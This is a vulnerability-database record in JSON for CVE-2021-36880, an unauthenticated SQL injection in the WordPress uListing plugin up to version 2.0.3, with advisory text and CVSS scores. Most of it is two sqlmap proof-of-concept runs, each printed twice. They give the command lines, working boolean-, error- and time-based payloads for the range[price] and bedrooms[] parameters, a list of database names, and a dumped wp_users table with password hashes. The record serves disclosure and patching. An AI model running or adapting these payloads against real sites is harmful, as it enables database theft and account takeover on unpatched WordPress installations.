{"patchstack": [{"lastseen": "2022-06-01T19:31:18", "description": "Unauthenticated SQL Injection (SQLi) vulnerability discovered by m0ze (Patchstack Red Team) in WordPress uListing plugin (versions <= 2.0.3).\n\n## Solution\n\n\r\n Update the WordPress uListing plugin to the latest available version (at least 2.0.4).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "patchstack", "title": "WordPress uListing plugin <= 2.0.3 - Unauthenticated SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36880"], "modified": "2021-07-26T00:00:00", "id": "PATCHSTACK:B31C1FA4F19BD2FD9F72E3B3B4323957", "href": "https://patchstack.com/database/vulnerability/ulisting/wordpress-ulisting-plugin-2-0-3-unauthenticated-sql-injection-sqli-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-10-01T11:30:02", "description": "An Unauthenticated SQL Injection vulnerability was discovered in the plugin. Vulnerable parameter(s): custom. SQL Injection type(s): Error-based, Boolean-based Blind, Time-based Blind.\n\n### PoC\n\nPoC #1 | Unauthenticated SQL Injection | Tables: sqlmap --url=\"https://example.com/?ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979&amenities;[]=16&current;_page=1\" -p range[price] --dbs ___ __H__ ___ ___[.]_____ ___ ___ {1.5.3.16#dev} |_ -| . [,] | .'| . | |___|_ [\"]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 16:47:59 /2021-06-18/ [16:47:59] [INFO] testing connection to the target URL [16:48:11] [INFO] testing if the target URL content is stable [16:48:25] [INFO] heuristic (basic) test shows that GET parameter 'range[price]' might be injectable (possible DBMS: 'MySQL') [16:51:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [16:51:11] [WARNING] reflective value(s) found and filtering out [16:51:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [16:52:02] [INFO] testing 'Generic inline queries' [16:52:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [16:54:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' [16:55:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' [16:58:19] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [16:58:53] [INFO] GET parameter 'range[price]' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable [16:58:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [16:59:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [16:59:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [16:59:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [16:59:33] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [16:59:35] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [16:59:38] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [16:59:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [16:59:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [16:59:51] [INFO] GET parameter 'range[price]' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [16:59:51] [INFO] testing 'MySQL inline queries' [16:59:53] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [16:59:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [17:00:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [17:00:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [17:00:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [17:00:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [17:00:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [17:01:20] [INFO] GET parameter 'range[price]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [17:06:45] [INFO] target URL appears to be UNION injectable with 49 columns injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y [17:25:10] [INFO] testing 'MySQL UNION query (25) - 61 to 80 columns' [17:26:04] [INFO] testing 'MySQL UNION query (25) - 81 to 100 columns' GET parameter 'range[price]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 737 HTTP(s) requests: \\--- Parameter: range[price] (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979) RLIKE (SELECT (CASE WHEN (4580=4580) THEN 0x313939383b32393739 ELSE 0x28 END)) AND (5841=5841&amenities;[]=16&current;_page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979) AND (SELECT 4060 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4060=4060,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (4201=4201&amenities;[]=16&current;_page=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979) AND (SELECT 9207 FROM (SELECT(SLEEP(60)))BqKJ) AND (1336=1336&amenities;[]=16&current;_page=1 \\--- [18:16:03] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.28 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [18:16:03] [INFO] fetching database names [18:16:03] [INFO] resumed: 'information_schema' [18:16:03] [INFO] resumed: 'db_inusti' [18:16:03] [INFO] resumed: 'db_tolips' [18:16:03] [INFO] resumed: 'db_krowd' [18:16:03] [INFO] resumed: 'db_halpes' [18:16:03] [INFO] resumed: 'db_kitecx' [18:16:03] [INFO] resumed: 'db_indutri' [18:16:03] [INFO] resumed: 'db_codesk' [18:16:03] [INFO] resumed: 'db_ziston' available databases [9]: [*] db_codesk [*] db_halpes [*] db_indutri [*] db_inusti [*] db_kitecx [*] db_krowd [*] db_tolips [*] db_ziston [*] information_schema [*] ending @ 18:16:03 /2021-06-18/ PoC #2 | Unauthenticated SQL Injection | wp_users data: sqlmap --url=\"https://example.com/?ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979&amenities;[]=16&current;_page=1\" --dbms=MySQL -p bedrooms[],bathrooms[],garages[],amenities[] --dump -D db_halpes -T wp_users -C id,user_email,user_login,user_pass ___ __H__ ___ ___[(]_____ ___ ___ {1.5.4.7#dev} |_ -| . [,] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 10:15:24 /2021-06-18/ [10:15:25] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: \\--- Parameter: bedrooms[] (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37)) RLIKE (SELECT (CASE WHEN (7907=7907) THEN 37 ELSE 0x28 END)) AND ((2011=2011&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979&amenities;[]=16&current;_page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37)) AND (SELECT 4032 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4032=4032,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((6842=6842&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979&amenities;[]=16&current;_page=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37)) AND (SELECT 8493 FROM (SELECT(SLEEP(60)))bkzv) AND ((7707=7707&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979&amenities;[]=16&current;_page=1 \\--- [10:15:28] [INFO] testing MySQL [10:15:30] [INFO] confirming MySQL [10:15:32] [WARNING] reflective value(s) found and filtering out [10:15:32] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.28 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [10:15:32] [INFO] fetching entries of column(s) 'id,user_email,user_login,user_pass' for table 'wp_users' in database 'db_halpes' [10:15:37] [INFO] retrieved: '1' [10:15:41] [INFO] retrieved: 'admin' [10:15:44] [INFO] retrieved: '$P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/' [10:15:46] [INFO] retrieved: '2' [10:15:49] [INFO] retrieved: 'demo' [10:15:51] [INFO] retrieved: '$P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3.' [10:15:52] [INFO] retrieved: '3' [10:15:55] [INFO] retrieved: 'give_donor' [10:15:57] [INFO] retrieved: '$P$BUfswym5bmce6zMYuxpAv3J4992KyH.' [10:15:58] [INFO] retrieved: '4' [10:16:02] [INFO] retrieved: 'give_accountant' [10:16:04] [INFO] retrieved: '$P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1' [10:16:06] [INFO] retrieved: '5' [10:16:09] [INFO] retrieved: 'give_manager' [10:16:10] [INFO] retrieved: '$P$BsODaEu5jVKRPcp18M6KRbppca824U0' [10:16:12] [INFO] retrieved: '6' [10:16:15] [INFO] retrieved: 'give_worker' [10:16:17] [INFO] retrieved: '$P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px.' Database: db_halpes Table: wp_users [6 entries] +----+------------+-----------------+------------------------------------+ | id | user_email | user_login | user_pass | +----+------------+-----------------+------------------------------------+ | 1 | | admin | $P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/ | | 2 | | demo | $P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3. | | 3 | | give_donor | $P$BUfswym5bmce6zMYuxpAv3J4992KyH. | | 4 | | give_accountant | $P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1 | | 5 | | give_manager | $P$BsODaEu5jVKRPcp18M6KRbppca824U0 | | 6 | | give_worker | $P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px. | +----+------------+-----------------+------------------------------------+ [*] ending @ 11:03:34 /2021-06-18/ \n", "cvss3": {}, "published": "2021-07-26T00:00:00", "type": "wpvulndb", "title": "uListing < 2.0.4 - Unauthenticated SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-36880"], "modified": "2021-09-27T18:21:43", "id": "WPVDB-ID:7B32E28E-9092-4ECC-95D0-A2B9464B4A9C", "href": "https://wpscan.com/vulnerability/7b32e28e-9092-4ecc-95d0-a2b9464b4a9c", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-10-01T11:30:02", "description": "An Unauthenticated SQL Injection vulnerability was discovered in the plugin. Vulnerable parameter(s): custom. SQL Injection type(s): Error-based, Boolean-based Blind, Time-based Blind.\n", "cvss3": {}, "published": "2021-07-26T00:00:00", "type": "wpexploit", "title": "uListing < 2.0.4 - Unauthenticated SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-36880"], "modified": "2021-09-27T18:21:43", "id": "WPEX-ID:7B32E28E-9092-4ECC-95D0-A2B9464B4A9C", "href": "", "sourceData": "PoC #1 | Unauthenticated SQL Injection | Tables:\r\n\r\nsqlmap --url=\"https://example.com/?ulisitng_title=13®ion=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16¤t_page=1\" -p range[price] --dbs\r\n ___\r\n __H__\r\n ___ ___[.]_____ ___ ___ {1.5.3.16#dev}\r\n|_ -| . [,] | .'| . |\r\n|___|_ [\"]_|_|_|__,| _|\r\n |_|V... |_| http://sqlmap.org\r\n\r\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\r\n\r\n[*] starting @ 16:47:59 /2021-06-18/\r\n\r\n[16:47:59] [INFO] testing connection to the target URL\r\n[16:48:11] [INFO] testing if the target URL content is stable\r\n[16:48:25] [INFO] heuristic (basic) test shows that GET parameter 'range[price]' might be injectable (possible DBMS: 'MySQL')\r\n[16:51:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\r\n[16:51:11] [WARNING] reflective value(s) found and filtering out\r\n[16:51:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'\r\n[16:52:02] [INFO] testing 'Generic inline queries'\r\n[16:52:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'\r\n[16:54:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'\r\n[16:55:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'\r\n[16:58:19] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'\r\n[16:58:53] [INFO] GET parameter 'range[price]' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable\r\n[16:58:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'\r\n[16:59:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'\r\n[16:59:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'\r\n[16:59:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'\r\n[16:59:33] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'\r\n[16:59:35] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'\r\n[16:59:38] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'\r\n[16:59:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'\r\n[16:59:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\r\n[16:59:51] [INFO] GET parameter 'range[price]' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable\r\n[16:59:51] [INFO] testing 'MySQL inline queries'\r\n[16:59:53] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\r\n[16:59:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\r\n[17:00:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\r\n[17:00:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'\r\n[17:00:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'\r\n[17:00:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'\r\n[17:00:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\r\n[17:01:20] [INFO] GET parameter 'range[price]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\r\n[17:06:45] [INFO] target URL appears to be UNION injectable with 49 columns\r\ninjection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y\r\n[17:25:10] [INFO] testing 'MySQL UNION query (25) - 61 to 80 columns'\r\n[17:26:04] [INFO] testing 'MySQL UNION query (25) - 81 to 100 columns'\r\nGET parameter 'range[price]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n\r\nsqlmap identified the following injection point(s) with a total of 737 HTTP(s) requests:\r\n---\r\nParameter: range[price] (GET)\r\n Type: boolean-based blind\r\n Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause\r\n Payload: ulisitng_title=13®ion=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) RLIKE (SELECT (CASE WHEN (4580=4580) THEN 0x313939383b32393739 ELSE 0x28 END)) AND (5841=5841&amenities[]=16¤t_page=1\r\n\r\n Type: error-based\r\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\r\n Payload: ulisitng_title=13®ion=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) AND (SELECT 4060 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4060=4060,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (4201=4201&amenities[]=16¤t_page=1\r\n\r\n Type: time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\r\n Payload: ulisitng_title=13®ion=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) AND (SELECT 9207 FROM (SELECT(SLEEP(60)))BqKJ) AND (1336=1336&amenities[]=16¤t_page=1\r\n---\r\n[18:16:03] [INFO] the back-end DBMS is MySQL\r\nweb application technology: PHP 7.3.28\r\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)\r\n[18:16:03] [INFO] fetching database names\r\n[18:16:03] [INFO] resumed: 'information_schema'\r\n[18:16:03] [INFO] resumed: 'db_inusti'\r\n[18:16:03] [INFO] resumed: 'db_tolips'\r\n[18:16:03] [INFO] resumed: 'db_krowd'\r\n[18:16:03] [INFO] resumed: 'db_halpes'\r\n[18:16:03] [INFO] resumed: 'db_kitecx'\r\n[18:16:03] [INFO] resumed: 'db_indutri'\r\n[18:16:03] [INFO] resumed: 'db_codesk'\r\n[18:16:03] [INFO] resumed: 'db_ziston'\r\navailable databases [9]:\r\n[*] db_codesk\r\n[*] db_halpes\r\n[*] db_indutri\r\n[*] db_inusti\r\n[*] db_kitecx\r\n[*] db_krowd\r\n[*] db_tolips\r\n[*] db_ziston\r\n[*] information_schema\r\n\r\n[*] ending @ 18:16:03 /2021-06-18/\r\n\r\n\r\nPoC #2 | Unauthenticated SQL Injection | wp_users data:\r\n\r\nsqlmap --url=\"https://example.com/?ulisitng_title=13®ion=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16¤t_page=1\" --dbms=MySQL -p bedrooms[],bathrooms[],garages[],amenities[] --dump -D db_halpes -T wp_users -C id,user_email,user_login,user_pass\r\n ___\r\n __H__\r\n ___ ___[(]_____ ___ ___ {1.5.4.7#dev}\r\n|_ -| . [,] | .'| . |\r\n|___|_ [)]_|_|_|__,| _|\r\n |_|V... |_| http://sqlmap.org\r\n\r\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\r\n\r\n[*] starting @ 10:15:24 /2021-06-18/\r\n\r\n[10:15:25] [INFO] testing connection to the target URL\r\nsqlmap resumed the following injection point(s) from stored session:\r\n---\r\nParameter: bedrooms[] (GET)\r\n Type: boolean-based blind\r\n Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause\r\n Payload: ulisitng_title=13®ion=50&category=47&bedrooms[]=37)) RLIKE (SELECT (CASE WHEN (7907=7907) THEN 37 ELSE 0x28 END)) AND ((2011=2011&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16¤t_page=1\r\n\r\n Type: error-based\r\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\r\n Payload: ulisitng_title=13®ion=50&category=47&bedrooms[]=37)) AND (SELECT 4032 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4032=4032,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((6842=6842&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16¤t_page=1\r\n\r\n Type: time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\r\n Payload: ulisitng_title=13®ion=50&category=47&bedrooms[]=37)) AND (SELECT 8493 FROM (SELECT(SLEEP(60)))bkzv) AND ((7707=7707&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16¤t_page=1\r\n---\r\n[10:15:28] [INFO] testing MySQL\r\n[10:15:30] [INFO] confirming MySQL\r\n[10:15:32] [WARNING] reflective value(s) found and filtering out\r\n[10:15:32] [INFO] the back-end DBMS is MySQL\r\nweb application technology: PHP 7.3.28\r\nback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)\r\n[10:15:32] [INFO] fetching entries of column(s) 'id,user_email,user_login,user_pass' for table 'wp_users' in database 'db_halpes'\r\n[10:15:37] [INFO] retrieved: '1'\r\n[10:15:41] [INFO] retrieved: 'admin'\r\n[10:15:44] [INFO] retrieved: '$P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/'\r\n[10:15:46] [INFO] retrieved: '2'\r\n[10:15:49] [INFO] retrieved: 'demo'\r\n[10:15:51] [INFO] retrieved: '$P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3.'\r\n[10:15:52] [INFO] retrieved: '3'\r\n[10:15:55] [INFO] retrieved: 'give_donor'\r\n[10:15:57] [INFO] retrieved: '$P$BUfswym5bmce6zMYuxpAv3J4992KyH.'\r\n[10:15:58] [INFO] retrieved: '4'\r\n[10:16:02] [INFO] retrieved: 'give_accountant'\r\n[10:16:04] [INFO] retrieved: '$P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1'\r\n[10:16:06] [INFO] retrieved: '5'\r\n[10:16:09] [INFO] retrieved: 'give_manager'\r\n[10:16:10] [INFO] retrieved: '$P$BsODaEu5jVKRPcp18M6KRbppca824U0'\r\n[10:16:12] [INFO] retrieved: '6'\r\n[10:16:15] [INFO] retrieved: 'give_worker'\r\n[10:16:17] [INFO] retrieved: '$P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px.'\r\nDatabase: db_halpes\r\nTable: wp_users\r\n[6 entries]\r\n+----+------------+-----------------+------------------------------------+\r\n| id | user_email | user_login | user_pass |\r\n+----+------------+-----------------+------------------------------------+\r\n| 1 | | admin | $P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/ |\r\n| 2 | | demo | $P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3. |\r\n| 3 | | give_donor | $P$BUfswym5bmce6zMYuxpAv3J4992KyH. |\r\n| 4 | | give_accountant | $P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1 |\r\n| 5 | | give_manager | $P$BsODaEu5jVKRPcp18M6KRbppca824U0 |\r\n| 6 | | give_worker | $P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px. |\r\n+----+------------+-----------------+------------------------------------+\r\n\r\n[*] ending @ 11:03:34 /2021-06-18/\r\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2021-36880
